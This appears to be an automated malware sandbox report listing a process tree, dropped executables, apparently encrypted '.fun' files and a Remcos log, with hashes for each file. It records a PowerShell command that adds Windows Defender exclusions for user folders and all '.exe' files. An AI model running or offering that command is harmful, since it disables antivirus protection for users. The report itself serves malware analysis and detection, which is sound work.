                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,13038021875009097898,15960877514934748322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:1
                                                                                                                          2⤵
                                                                                                                            PID:4308
                                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:4584
                                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:4808
                                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:5304
                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:5328
                                                                                                                                • C:\Users\Admin\svchost.exe
                                                                                                                                  C:\Users\Admin\svchost.exe
                                                                                                                                  1⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:3220
                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                  1⤵
                                                                                                                                    PID:5616
                                                                                                                                  • C:\Windows\SysWOW64\werfault.exe
                                                                                                                                    werfault.exe /h /shared Global\315b1691ffba4726b91ab3fe79f0ad9a /t 5184 /p 1000
                                                                                                                                    1⤵
                                                                                                                                      PID:3064
                                                                                                                                    • C:\Users\Admin\svchost.exe
                                                                                                                                      C:\Users\Admin\svchost.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:6080
                                                                                                                                      • C:\Windows\system32\dwm.exe
                                                                                                                                        "dwm.exe"
                                                                                                                                        1⤵
                                                                                                                                          PID:3316
                                                                                                                                        • C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe
                                                                                                                                          C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:1832
                                                                                                                                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                              2⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              PID:1316

                                                                                                                                          Network

                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                          Replay Monitor

                                                                                                                                          Loading Replay Monitor...

                                                                                                                                          Downloads

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.fun

                                                                                                                                            Filesize

                                                                                                                                            720B

                                                                                                                                            MD5

                                                                                                                                            75a585c1b60bd6c75d496d3b042738d5

                                                                                                                                            SHA1

                                                                                                                                            02c310d7bf79b32a43acd367d031b6a88c7e95ed

                                                                                                                                            SHA256

                                                                                                                                            5ebbfc6df60e21044486a5df3cb47ccdcd7a4d5f197804555715ffd9bf6c5834

                                                                                                                                            SHA512

                                                                                                                                            663a302e651b9167f4c4e6ae30028307b4d8da0dda3a0e5fd414104951d50419862fc9396c5b39fe5c4b696efd3efbf0b575688983b1d341f3ef38becf500505

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons.png.fun

                                                                                                                                            Filesize

                                                                                                                                            7KB

                                                                                                                                            MD5

                                                                                                                                            72269cd78515bde3812a44fa4c1c028c

                                                                                                                                            SHA1

                                                                                                                                            87cada599a01acf0a43692f07a58f62f5d90d22c

                                                                                                                                            SHA256

                                                                                                                                            7c78b3da50c1135a9e1ecace9aea4ea7ac8622d2a87b952fc917c81010c953f7

                                                                                                                                            SHA512

                                                                                                                                            3834b7a8866e8656bbdbf711fc400956e9b7a14e192758f26ccf31d8f6ab8e34f7b1983c1845dc84e45ff70555e423d54a475f6a668511d3bcbdd1d460eeb4b0

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_ie8.gif.fun

                                                                                                                                            Filesize

                                                                                                                                            7KB

                                                                                                                                            MD5

                                                                                                                                            eda4add7a17cc3d53920dd85d5987a5f

                                                                                                                                            SHA1

                                                                                                                                            863dcc28a16e16f66f607790807299b4578e6319

                                                                                                                                            SHA256

                                                                                                                                            97f6348eaa48800e603d11fa22c62e10682ad919e7af2b2e59d6bd53937618f2

                                                                                                                                            SHA512

                                                                                                                                            d59fa9648dc7cb76a5163014f91b6d65d33aaa86fc9d9c73bf147943a3254b4c4f77f06b2e95bb8f94246a982ea466eb33dac9573dd62f40953fd23de1c1b498

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_retina.png.fun

                                                                                                                                            Filesize

                                                                                                                                            15KB

                                                                                                                                            MD5

                                                                                                                                            7dbb12df8a1a7faae12a7df93b48a7aa

                                                                                                                                            SHA1

                                                                                                                                            07800ce598bee0825598ad6f5513e2ba60d56645

                                                                                                                                            SHA256

                                                                                                                                            aecde4eb94a19095495d76ef3189a9abd45bcfd41acbed7705d22b4c7d00aa77

                                                                                                                                            SHA512

                                                                                                                                            96e454ebb4c96573e8edc6822290c22d425f4c7f7adbab35e6dc4b3ce04a5916ae9254c2c312c98299835ecbf3c5aa95da2939b8408ac25fbae44ba87a3795dc

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons.png.fun

                                                                                                                                            Filesize

                                                                                                                                            8KB

                                                                                                                                            MD5

                                                                                                                                            82a2e835674d50f1a9388aaf1b935002

                                                                                                                                            SHA1

                                                                                                                                            e09d0577da42a15ec1b71a887ff3e48cfbfeff1a

                                                                                                                                            SHA256

                                                                                                                                            904372666ca3c40f92b20317d92ca531678958affbc34591401e338146fe0ecb

                                                                                                                                            SHA512

                                                                                                                                            b10a8e384d0bd088443a5085f5c22a296f6f4d295a053d4526690ba65846e887daec47d01cf18fdf1160db98061a8b7c4040de56e6e604451a821fadccf32698

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png.fun

                                                                                                                                            Filesize

                                                                                                                                            17KB

                                                                                                                                            MD5

                                                                                                                                            150c9a9ed69b12d54ada958fcdbb1d8a

                                                                                                                                            SHA1

                                                                                                                                            804c540a51a8d14c6019d3886ece68f32f1631d5

                                                                                                                                            SHA256

                                                                                                                                            2dee41184747742fbdc527b2023d67fecec1ccdfdf258439a06cd75d4fd33f43

                                                                                                                                            SHA512

                                                                                                                                            70193ee6f0919eb14311f43b5a5da041deacb568db55fc43290ee76e17af902ac468435b37a150630ea3b7871c724073915ae5dcba3c301ac42f2d68dd598e2f

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.fun

                                                                                                                                            Filesize

                                                                                                                                            448B

                                                                                                                                            MD5

                                                                                                                                            880833ad1399589728c877f0ebf9dce0

                                                                                                                                            SHA1

                                                                                                                                            0a98c8a78b48c4b1b4165a2c6b612084d9d26dce

                                                                                                                                            SHA256

                                                                                                                                            7a27d891097df183fbf0031e3894bdac0ce77aef15d666ddd9f6a04e9836fb27

                                                                                                                                            SHA512

                                                                                                                                            0ddf247892a72a390437390d535debf6e41d12e51b31eb4f0353b710ec380c5fbc531a48e76935088063a41aca843287d3def9c1cd46be05b8dcb69f5017a464

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.fun

                                                                                                                                            Filesize

                                                                                                                                            624B

                                                                                                                                            MD5

                                                                                                                                            409a8070b50ad164eda5691adf5a2345

                                                                                                                                            SHA1

                                                                                                                                            e84e10471f3775d5d706a3b7e361100c9fbfaf74

                                                                                                                                            SHA256

                                                                                                                                            a91790b778026db625c9dedfe1c6d94b884818b33d7977e86b2f9c2f3c500796

                                                                                                                                            SHA512

                                                                                                                                            767a75edd37d29b3433040ce21cda849cd11ba549f27581f7edc6416c433ba7047c56908d40956422393ab0f35ede61617d4bd2aad0bde3d1ebd276584c858c7

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.fun

                                                                                                                                            Filesize

                                                                                                                                            400B

                                                                                                                                            MD5

                                                                                                                                            2884524604c89632ebbf595e1d905df9

                                                                                                                                            SHA1

                                                                                                                                            b6053c85110b0364766e18daab579ac048b36545

                                                                                                                                            SHA256

                                                                                                                                            ae2facd997527426fc4def82e0db68be29b44499bfff86a28c36f7c31b177d4f

                                                                                                                                            SHA512

                                                                                                                                            0b506397627823a1768796129c6b37d146821471b89338b5f2d0fd3aea707fd46a8e197ee0e298ddfb3b50eef0a0b064946006346b060f733ef19cbd5d24fc90

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.fun

                                                                                                                                            Filesize

                                                                                                                                            560B

                                                                                                                                            MD5

                                                                                                                                            e092d14d26938d98728ce4698ee49bc3

                                                                                                                                            SHA1

                                                                                                                                            9f8ee037664b4871ec02ed6bba11a5317b9e784a

                                                                                                                                            SHA256

                                                                                                                                            5e8ec278a273be22199884d519a79f748801baa3a45b76e57569fdfffe96e7fb

                                                                                                                                            SHA512

                                                                                                                                            b2fcb5d46339cdf6b5a954f2a083cf913779e57cb6e8699bc5da1fba1c370c41117b7ddefb50075622067eb7b02a20268bc047171bd883bcda4a497c2ec64ea4

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png.fun

                                                                                                                                            Filesize

                                                                                                                                            400B

                                                                                                                                            MD5

                                                                                                                                            0c680b0b1e428ebc7bff87da2553d512

                                                                                                                                            SHA1

                                                                                                                                            f801dedfc3796d7ec52ee8ba85f26f24bbd2627c

                                                                                                                                            SHA256

                                                                                                                                            9433084e61062d2b709c1390e298ddaf3fb0226656662c04c0b7026a44dee750

                                                                                                                                            SHA512

                                                                                                                                            2d1399a6bf225b048d2b12656e941ad912636acae2dec387f92f33ac80629a1e504bca63580ba73a8ed073788f697274d5eb76ea1b089f0555fd397a8f5cbbff

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.fun

                                                                                                                                            Filesize

                                                                                                                                            560B

                                                                                                                                            MD5

                                                                                                                                            be26a499465cfbb09a281f34012eada0

                                                                                                                                            SHA1

                                                                                                                                            b8544b9f569724a863e85209f81cd952acdea561

                                                                                                                                            SHA256

                                                                                                                                            9095e9b4759e823e96984981af41b7a9915a5ecaa6be769f89c13484cef9e0f5

                                                                                                                                            SHA512

                                                                                                                                            28196e5de9670e9f63adcf648368bd3ea5926a03e28a13adc2fb69c567fba2f84e4f162637c487acb64eda2e30993f849806f2313820ba693c7e70303542d04f

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.fun

                                                                                                                                            Filesize

                                                                                                                                            400B

                                                                                                                                            MD5

                                                                                                                                            2de4e157bf747db92c978efce8754951

                                                                                                                                            SHA1

                                                                                                                                            c8d31effbb9621aefac55cf3d4ecf8db5e77f53d

                                                                                                                                            SHA256

                                                                                                                                            341976b4fe312824d02512d74770a6df9e1c37123781655532bd9cd97ea65fa9

                                                                                                                                            SHA512

                                                                                                                                            3042a742c38434ae3ee4fe10f7137462cdebad5cae0f9a85fb61063d15a30e1b54ac878b1af65f699c6ca1a9d2c3e58d245e54bdebfadc460cbd060836734e11

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png.fun

                                                                                                                                            Filesize

                                                                                                                                            560B

                                                                                                                                            MD5

                                                                                                                                            ad091690b979144c795c59933373ea3f

                                                                                                                                            SHA1

                                                                                                                                            5d9e481bc96e6f53b6ff148b0da8417f63962ada

                                                                                                                                            SHA256

                                                                                                                                            7805ac9d0e05d560023e5aabed960d842e4f3ec2aa3db45a9cfb541688e2edb1

                                                                                                                                            SHA512

                                                                                                                                            23b4c799a7b25f70962e8dd0ec7286ba7150053cab7c88f5fb1efc1095c2987bd6f3572e7fb3ee4b2238958e52a763de2c84a74615df7a6d3a19a034584fd687

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons.png.fun

                                                                                                                                            Filesize

                                                                                                                                            688B

                                                                                                                                            MD5

                                                                                                                                            65368c6dd915332ad36d061e55d02d6f

                                                                                                                                            SHA1

                                                                                                                                            fb4bc0862b192ad322fcb8215a33bd06c4077c6b

                                                                                                                                            SHA256

                                                                                                                                            6f9c7ebec5a707de439e3fd2e278fdfa07a39465d56157b70b24f091509bf76f

                                                                                                                                            SHA512

                                                                                                                                            8bb9a7690aeb3c0b9e14e1a6ebc5741536d354cf2324fd74ee0c3e4ef511718f7795039a94c8d2df94b6e6d0fb1762191cb649089d1def12abdf34003f0cdd0f

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons2x.png.fun

                                                                                                                                            Filesize

                                                                                                                                            1KB

                                                                                                                                            MD5

                                                                                                                                            0d35b2591dc256d3575b38c748338021

                                                                                                                                            SHA1

                                                                                                                                            313f42a267f483e16e9dd223202c6679f243f02d

                                                                                                                                            SHA256

                                                                                                                                            1ca0cfc2df0354c8d886285ae5e743d9c7cc030e1afd68ac113c0f2ce43ad5fa

                                                                                                                                            SHA512

                                                                                                                                            f6c58c27bbde7508a866bd0e7fabadb13a4f020378cd8b8cfc0c9fa23f645d811d6cdea04b81afdf30c064c6248152e74b3e6a78ec7a3d1d19037a0db8897d7e

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png.fun

                                                                                                                                            Filesize

                                                                                                                                            192B

                                                                                                                                            MD5

                                                                                                                                            b8454390c3402747f7c5e46c69bea782

                                                                                                                                            SHA1

                                                                                                                                            e922c30891ff05939441d839bfe8e71ad9805ec0

                                                                                                                                            SHA256

                                                                                                                                            76f8ed1dd50e50c7d62b804a0d6901a93e5534787d7b38467933d4c12ce98a0d

                                                                                                                                            SHA512

                                                                                                                                            22b26c62473e80d17c1f78df14757ccfb6c7175faa541705edc153c02baa7ab0982b5daabe8dd2c8c9efb92af81f55ccaeeecffe8ed9a0b3c26e89135ca50923

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_patterns_header.png.fun

                                                                                                                                            Filesize

                                                                                                                                            704B

                                                                                                                                            MD5

                                                                                                                                            6e333be79ea4454e2ae4a0649edc420d

                                                                                                                                            SHA1

                                                                                                                                            95a545127e10daea20fd38b29dcc66029bd3b8bc

                                                                                                                                            SHA256

                                                                                                                                            112f72ef2bc57de697b82b731775fba3f518d1ae072120cd11b732bf4a782e36

                                                                                                                                            SHA512

                                                                                                                                            bed5906c7373814acc8a54c1631428a17f0aa69282920447a1575d8db826afd5dab262301dc6da610ff8bb81d24ec6babd3d9fb99fd6945f1aca9cb9c76ec2c9

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations.png.fun

                                                                                                                                            Filesize

                                                                                                                                            8KB

                                                                                                                                            MD5

                                                                                                                                            3ae8789eb89621255cfd5708f5658dea

                                                                                                                                            SHA1

                                                                                                                                            6c3b530412474f62b91fd4393b636012c29217df

                                                                                                                                            SHA256

                                                                                                                                            7c5b1d8469e232a58359ccbcb89e619c81c20e6d2c7579e4292eb9a19849bc5a

                                                                                                                                            SHA512

                                                                                                                                            f6998dbae1a2fa56f962045261a11a50b8e03573d9d4cf39083da3be341cc104e0ecf5908076f03961bcdb1356d05a7450d69940ec3aaab73623a6fe180e7051

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations_retina.png.fun

                                                                                                                                            Filesize

                                                                                                                                            19KB

                                                                                                                                            MD5

                                                                                                                                            b7c62677ce78fbd3fb9c047665223fea

                                                                                                                                            SHA1

                                                                                                                                            3218c7b6fd8be5e0a8b67d3953d37d5dbd0c71d8

                                                                                                                                            SHA256

                                                                                                                                            aa638be6e1107ed1f14e8430abedd6f6d0a837a31b1b63e6a7741d6d417eddc2

                                                                                                                                            SHA512

                                                                                                                                            9e0cc29835845f2a0260a6989c1b362bac22a8e0c2825bc18f1dde812ce7868503881d2deaf951429a80b5017b6ce31e785ff524883e08d730aa38b36a2fb074

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js.fun

                                                                                                                                            Filesize

                                                                                                                                            832B

                                                                                                                                            MD5

                                                                                                                                            117d6f863b5406cd4f2ac4ceaa4ba2c6

                                                                                                                                            SHA1

                                                                                                                                            5cac25f217399ea050182d28b08301fd819f2b2e

                                                                                                                                            SHA256

                                                                                                                                            73acdc730d8a9ec8f340c724b4db96fc222bb1eaf836cec69dfe3fab8d6ac362

                                                                                                                                            SHA512

                                                                                                                                            e10883029c1e0fbc64bec9aac0a6957a8499af255e1790843717212077926474e02b2870c5dd04b057c956b97ad4bb1747fe73e731ea61b891f4b38dd80494d7

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js.fun

                                                                                                                                            Filesize

                                                                                                                                            1KB

                                                                                                                                            MD5

                                                                                                                                            433755fcc2552446eb1345dd28c924eb

                                                                                                                                            SHA1

                                                                                                                                            23863f5257bdc268015f31ab22434728e5982019

                                                                                                                                            SHA256

                                                                                                                                            d6c290e942ee665d71e288229423a1f1866842988eac01f886910b0ec383aa9b

                                                                                                                                            SHA512

                                                                                                                                            de83b580ce27012a7677e1da867c91e2a42dbc6b5872dcf756ace51c2862801814665ecca997171f2e550e8b9a3de19994d2516a4e5d4d57e16c7b4b823236c0

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js.fun

                                                                                                                                            Filesize

                                                                                                                                            1KB

                                                                                                                                            MD5

                                                                                                                                            781ed8cdd7186821383d43d770d2e357

                                                                                                                                            SHA1

                                                                                                                                            99638b49b4cfec881688b025467df9f6f15371e8

                                                                                                                                            SHA256

                                                                                                                                            a955039cd9e53674395f4b758218e4d59c89e99a0c4d2a909e49f6008b8f5dd4

                                                                                                                                            SHA512

                                                                                                                                            87cb9c4288586df232200f7bbacee3dee04f31c9444902dd369ad5c392d71e9837ebf8b3bb0fcb4a5db8a879cf757e97ce248939e3316c6bf3a3fe7cbe579534

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png.fun

                                                                                                                                            Filesize

                                                                                                                                            2KB

                                                                                                                                            MD5

                                                                                                                                            51da980061401d9a49494b58225b2753

                                                                                                                                            SHA1

                                                                                                                                            3445ffbf33f012ff638c1435f0834db9858f16d3

                                                                                                                                            SHA256

                                                                                                                                            3fb25ddd378ab756ec9faa56f16b76691cf6d9c7405bb9a09ce542a6f5b94e44

                                                                                                                                            SHA512

                                                                                                                                            ecc5eb2a045ce2508d461b999f16caba6cce55aa0c00b34bd73a33e0458795f93a77caff5026212912684164057be016f51dc57ec83821c2a1f2e27417c47b2c

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.fun

                                                                                                                                            Filesize

                                                                                                                                            2KB

                                                                                                                                            MD5

                                                                                                                                            2863e8df6fbbe35b81b590817dd42a04

                                                                                                                                            SHA1

                                                                                                                                            562824deb05e2bfe1b57cd0abd3fc7fbec141b7c

                                                                                                                                            SHA256

                                                                                                                                            7f1238332901b740cde70db622abcfb533fc02f71e93101340073552f4820dad

                                                                                                                                            SHA512

                                                                                                                                            7b2d95465ea66951ea05c341549535a0a939d26dbde365b212e3983e4047fa6912c37d737cb8054c41bb1a7d92586d968a0154c666572a70ebc59a4776897f38

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png.fun

                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                            MD5

                                                                                                                                            79f6f006c95a4eb4141d6cedc7b2ebeb

                                                                                                                                            SHA1

                                                                                                                                            012ca3de08fb304f022f4ea9565ae465f53ab9e8

                                                                                                                                            SHA256

                                                                                                                                            e9847d0839d3cf1039bebdc49820ee7813d70941347ce420990592e5e3bd998e

                                                                                                                                            SHA512

                                                                                                                                            c143a4cf1ccfa98039b73214978722408188535ee4aa3dac08a34760b94bdf6d36ad0ff0de893da5b17fd69c96a6dfb25098ab7fec219fad1a77532113d0353e

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png.fun

                                                                                                                                            Filesize

                                                                                                                                            304B

                                                                                                                                            MD5

                                                                                                                                            b88e3983f77632fa21f1d11ac7e27a64

                                                                                                                                            SHA1

                                                                                                                                            03a2b008cc3fe914910b0250ed4d49bd6b021393

                                                                                                                                            SHA256

                                                                                                                                            8469b8a64e80d662eec71c50513f6d295ef4a3a9992763dbcac9d81253cef9d5

                                                                                                                                            SHA512

                                                                                                                                            5bf93d4f4250ca96169f3d27d4e648cc5d6e00b7558a3ef32e07edcbae36dadb8008d7ba5f83ac3ed812b72c9d52730e866191b4de7a339df57b5697e00df50d

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png.fun

                                                                                                                                            Filesize

                                                                                                                                            400B

                                                                                                                                            MD5

                                                                                                                                            f77086a1d20bca6ba75b8f2fef2f0247

                                                                                                                                            SHA1

                                                                                                                                            db7c58faaecd10e4b3473b74c1277603a75d6624

                                                                                                                                            SHA256

                                                                                                                                            cf10d2a22b638cf0978cf30ecaf39ecb5bb0e3ad78cd920afa433ad60cc1290d

                                                                                                                                            SHA512

                                                                                                                                            a77a897c0b41f4052cb9546d4cfd6e0856b288b6b8583a86d6c7e79059a05b19cc2593599251581e79107235e9d5cd589c392bf490452be04ff57e944cd19df3

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png.fun

                                                                                                                                            Filesize

                                                                                                                                            1008B

                                                                                                                                            MD5

                                                                                                                                            e03c9cd255f1d8d6c03b52fee7273894

                                                                                                                                            SHA1

                                                                                                                                            d0e9a9e6efd1746bc9ccb4eb8e7701c1cd707e2e

                                                                                                                                            SHA256

                                                                                                                                            22a34c8321384fc7682102e40d082e7812232a9109e4d4e8fa2152fda3f260f6

                                                                                                                                            SHA512

                                                                                                                                            d4bd002197b725316e1f1f2dd0a70ee44a82a53ac0dafa8c6b1166343adc406e147d0c4cca30d65a32aa545f1b327c6b69c0ec1d15330af48a6faa234dc4b5ac

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png.fun

                                                                                                                                            Filesize

                                                                                                                                            1KB

                                                                                                                                            MD5

                                                                                                                                            62b1443d82968878c773a1414de23c82

                                                                                                                                            SHA1

                                                                                                                                            192bbf788c31bc7e6fe840c0ea113992a8d8621c

                                                                                                                                            SHA256

                                                                                                                                            4e96529c023168df8dde241a9acdbf4788ea65bc35605e18febff2b2071f1e24

                                                                                                                                            SHA512

                                                                                                                                            75c8604ea65e0cdd9ea74b4802930444dd16a945da1e7f0af4a9a3762259ee9eb41ea96973555d06f4814ee2f6b73ab662c6b314b97876e9628fa5d4536e771c

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png.fun

                                                                                                                                            Filesize

                                                                                                                                            2KB

                                                                                                                                            MD5

                                                                                                                                            bca915870ae4ad0d86fcaba08a10f1fa

                                                                                                                                            SHA1

                                                                                                                                            7531259f5edae780e684a25635292bf4b2bb1aac

                                                                                                                                            SHA256

                                                                                                                                            d153ed6c5ea8c2c2f1839f8dadcc730f61bd8cd86ad732bab002a258dea1d037

                                                                                                                                            SHA512

                                                                                                                                            03f23de6b0ae10e63c41e73308b3844d49379c55d2df75fa1dc00771b26253d832c21081d8289f04260369df996e31273b7c0788cf3b5c78a27ec909f14a283a

                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\ui-strings.js.fun

                                                                                                                                            Filesize

                                                                                                                                            848B

                                                                                                                                            MD5

                                                                                                                                            14145467d1e7bd96f1ffe21e0ae79199

                                                                                                                                            SHA1

                                                                                                                                            5db5fbd88779a088fd1c4319ff26beb284ad0ff3

                                                                                                                                            SHA256

                                                                                                                                            7a75b8ec8809c460301f30e1960b13c518680792e5c743ce7e9a7f691cfafc38

                                                                                                                                            SHA512

                                                                                                                                            762d499c54c5a25aba4357a50bb4e6b47451babeda84fa62cfbd649f8350bca55204ad002883b9147e78dda3dbabaae8da1dc94b716204226bb53326030772b7

                                                                                                                                          • C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.fun

                                                                                                                                            Filesize

                                                                                                                                            32KB

                                                                                                                                            MD5

                                                                                                                                            829165ca0fd145de3c2c8051b321734f

                                                                                                                                            SHA1

                                                                                                                                            f5cc3af85ab27c3ea2c2f7cbb8295b28a76a459e

                                                                                                                                            SHA256

                                                                                                                                            a193ee2673e0ba5ebc5ea6e65665b8a28bd7611f06d2b0174ec2076e22d94356

                                                                                                                                            SHA512

                                                                                                                                            7d380cda12b342a770def9d4e9c078c97874f3a30cd9f531355e3744a8fef2308f79878ffeb12ce26953325cb6a17bc7e54237dfdc2ee72b140ec295676adbcb

                                                                                                                                          • C:\Program Files (x86)\Serbia Ice Hockey DB\Hokej.exe

                                                                                                                                            Filesize

                                                                                                                                            11.3MB

                                                                                                                                            MD5

                                                                                                                                            89d9527f0a0dee03a03b82ee9e5970ac

                                                                                                                                            SHA1

                                                                                                                                            8954423f287c61b6762e3c7646c25035cd0ac3d2

                                                                                                                                            SHA256

                                                                                                                                            c51289c49ea88eae719f69ebe2d85f30993d8c7af297e1f47149e96b431a046e

                                                                                                                                            SHA512

                                                                                                                                            42f95eced4f002e2e5f10fd8507f706277a7d9f057bdcb6c867db18bbba0ca28f035a55373c5a483d22bbec6f3371b21566fc92f2d8419be0d3dbf9ff264161f

                                                                                                                                          • C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\invalid32x32.gif.fun

                                                                                                                                            Filesize

                                                                                                                                            160B

                                                                                                                                            MD5

                                                                                                                                            580ee0344b7da2786da6a433a1e84893

                                                                                                                                            SHA1

                                                                                                                                            60f8c4dd5457e9834f5402cb326b1a2d3ca0ba7e

                                                                                                                                            SHA256

                                                                                                                                            98b6c2ddfefc628d03ceaef9d69688674a6bc32eb707f9ed86bc8c75675c4513

                                                                                                                                            SHA512

                                                                                                                                            356d2cdea3321e894b5b46ad1ea24c0e3c8be8e3c454b5bd300b7340cbb454e71fc89ca09ea0785b373b483e67c2f6f6bb408e489b0de4ff82d5ed69a75613ba

                                                                                                                                          • C:\ProgramData\remcos\logs.dat

                                                                                                                                            Filesize

                                                                                                                                            80B

                                                                                                                                            MD5

                                                                                                                                            df4eb46b2f8c6d55092e768f2ff6cc24

                                                                                                                                            SHA1

                                                                                                                                            e1975a57d056aa72ae349f8412de8b62583e919f

                                                                                                                                            SHA256

                                                                                                                                            85e761e8c7140211840316308f144a3be3481ab1e034ce1f0fab8e99d81440aa

                                                                                                                                            SHA512

